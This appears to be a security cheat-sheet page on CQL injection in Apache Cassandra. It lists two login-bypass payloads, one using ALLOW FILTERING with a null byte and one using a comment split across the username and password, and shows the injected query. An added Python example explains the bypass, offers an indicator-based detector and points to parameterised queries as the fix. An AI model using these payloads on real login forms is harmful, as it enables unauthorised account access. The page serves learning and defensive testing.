# Cassandra Injection

> Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system
## Summary

* [Cassandra comment](#cassandra-comment)
* [Cassandra - Login Bypass](#cassandra---login-bypass)
    * [Login Bypass 0](#login-bypass-0)
    * [Login Bypass 1](#login-bypass-1)
* [References](#references)
## Cassandra comment

```sql
/* Cassandra Comment */
```
## Cassandra - Login Bypass

### Login Bypass 0

```sql
username: admin' ALLOW FILTERING; %00
password: ANY
```
### Login Bypass 1

```sql
username: admin'/*
password: */and pass>'
```
Once both values are concatenated into the server-side query, the injection produces the following CQL statement:

```sql
SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILTERING;
```
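As an added example (not code from the original page or from the referenced write-up), the Python below rebuilds the concatenated query above, removes the block comment the way the CQL parser would so the surviving password clause is visible, and lists which payload indicators a submitted login value carries; the query template and the indicator names are assumptions.

```python
# Assumed vulnerable template: untrusted login form values interpolated into CQL,
# reproducing the query shown above (template is an assumption, not real app code).
CQL_TEMPLATE = "SELECT * FROM users WHERE user = '{user}' AND pass = '{pw}' ALLOW FILTERING;"


def build_query_unsafe(user: str, pw: str) -> str:
    """Vulnerable construction: string interpolation instead of bound parameters."""
    return CQL_TEMPLATE.format(user=user, pw=pw)


def effective_cql(query: str) -> str:
    """Return the query as the CQL parser sees it: /* ... */ block comments removed,
    but only outside single-quoted literals (where '' is an escaped quote)."""
    out, i, n, in_str = [], 0, len(query), False
    while i < n:
        c = query[i]
        if in_str:
            out.append(c)
            if c == "'":
                if i + 1 < n and query[i + 1] == "'":  # escaped quote ''
                    out.append("'")
                    i += 1
                else:
                    in_str = False
        elif c == "'":
            in_str = True
            out.append(c)
        elif query.startswith("/*", i):
            end = query.find("*/", i + 2)
            i = n if end == -1 else end + 2  # skip the whole comment
            continue
        else:
            out.append(c)
        i += 1
    return "".join(out)


# Indicator tokens taken from the two login-bypass payloads above (names assumed).
INDICATORS = {
    "quote": "'", "comment_open": "/*", "comment_close": "*/",
    "allow_filtering": "allow filtering", "null_byte": "%00",
}


def login_input_indicators(value: str) -> list[str]:
    """Detection heuristic for login form values: list the indicators present."""
    low = value.lower()
    return [name for name, token in INDICATORS.items() if token in low]
```

With the comment stripped, the password condition has become `pass > ''`, which any non-empty stored value satisfies; binding the form values as prepared-statement parameters instead of concatenating them removes the issue.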
Example from EternalNoob: [https://hack2learn.pw/cassandra/login.php](https://hack2learn.pw/cassandra/login.php)

## References

* [Injection In Apache Cassandra – Part I - Rodolfo - EternalNoobs](https://eternalnoobs.com/injection-in-apache-cassandra-part-i/)